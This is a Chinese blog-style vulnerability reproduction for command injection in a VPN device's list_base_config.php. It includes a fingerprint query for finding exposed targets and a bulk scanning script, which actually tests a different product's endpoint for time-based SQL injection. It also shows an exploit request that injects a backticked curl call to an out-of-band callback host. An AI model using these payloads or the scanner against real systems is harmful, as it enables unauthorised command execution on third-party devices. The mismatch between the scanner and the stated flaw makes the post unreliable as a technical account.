【漏洞复现】某某康达vpn list_base_config 远程命令执行漏洞

           声明：本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动，将与本文档的作者或发布者无关。

一、漏洞描述

网络设备是确保计算机网络顺畅运行的关键硬件组件，主要包括路由器、交换机、网桥、网卡、集线器、防火墙、调制解调器以及无线接入点等。其中，路由器主要负责在不同网络之间进行数据转发和地址转换；交换机则用于局域网内各设备的连接和数据交换；网桥的作用是连接不同网段，实现它们之间的通信；网卡则为计算机提供有线或无线网络接口。防火墙的主要职责是监控和控制网络流量，以维护网络的安全。然而，如果网络设备中的list_base_config.php接口存在命令执行漏洞，攻击者就可能利用这一漏洞获取系统权限。

二、资产收集

1.使用网络空间测绘引擎搜索

鹰图检索：web.body="/images/raisecom/back.gif"

2.使用poc批量扫描

import requests
import urllib3
from urllib.parse import urljoin, quote
import argparse
import ssl
import re

# 禁用SSL证书验证，忽略警告
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def read_file(file_path):
    """
    读取文件中的URL列表
    :param file_path: 文件路径
    :return: URL列表
    """
    with open(file_path, 'r') as file:
        urls = file.read().splitlines()
    return urls

def check(url):
    """
    检查目标URL是否存在SQL注入漏洞
    :param url: 目标URL
    :return: 如果存在漏洞，返回True
    """
    url = url.rstrip("/")
    target = urljoin(url, "/SystemManager/Api/TicketManager.ashx")
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    # 构造SQL注入数据包
    data = "Method=GetReServeOrder&solutionId=1' WAITFOR DELAY '0:0:5'--"
    try:
        response = requests.post(target, verify=False, headers=headers, timeout=25, data=data)
        # 判断响应状态码、响应内容以及响应时间是否符合预期
        if response.status_code == 200 and 'Table' in response.text and 5 < response.elapsed.total_seconds() < 10:
            print(f"\033[31mDiscovered:{url}: zckxTicketManager_SQLInject!\033[0m")
            return True
    except Exception as e:
        pass

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="URL")
    parser.add_argument("-f", "--txt", help="file")
    args = parser.parse_args()
    url = args.url
    txt = args.txt
    if url:
        check(url)
    elif txt:
        urls = read_file(txt)
        for url in urls:
            check(url)
    else:
        print("help")

cmd运行poc脚本：python poc.py -f host.txt

 随机寻找的幸运儿

三、漏洞复现 

1.构造数据包

1.构造数据包：

GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60curl%201111.7rzhzevp0iszj2p5s5186r25jwpndf14.oastify.com%60 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close

2.数据包分析 

1. 这是一个HTTP GET请求的数据包，下面是对该数据包的解析：

2. 请求行：GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60curl%201111.7rzhzevp0iszj2p5s5186r25jwpndf14.oastify.com%60 HTTP/1.1

   • GET: 表示这是一个HTTP GET请求。
   • /vpn/list_base_config.php: 请求的资源路径。
   • ?type=mod&parts=base_config&template=%60curl%201111.7rzhzevp0iszj2p5s5186r25jwpndf14.oastify.com%60: 查询参数，包括type, parts, template等。
   • HTTP/1.1: HTTP协议版本。

3. 请求头：

   • Host: x.x.x.x: 目标服务器的主机名或IP地址。
   • User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36: 客户端浏览器的信息。
   • Connection: close: 表示请求完成后关闭连接。

4. 这个数据包是一个HTTP请求，用于获取位于http://x.x.x.x/vpn/list_base_config.php的资源，并传递了一些查询参数。

3.结束跑路

1.使用DNSLog.cn获取一个Domain

2.构造数据包，执行curl命令访问DNSLog生产的domain

3.DNSLog获取服务器的IP地址

每篇一言：纵使天光终将熄灭，我们也要歌颂太阳。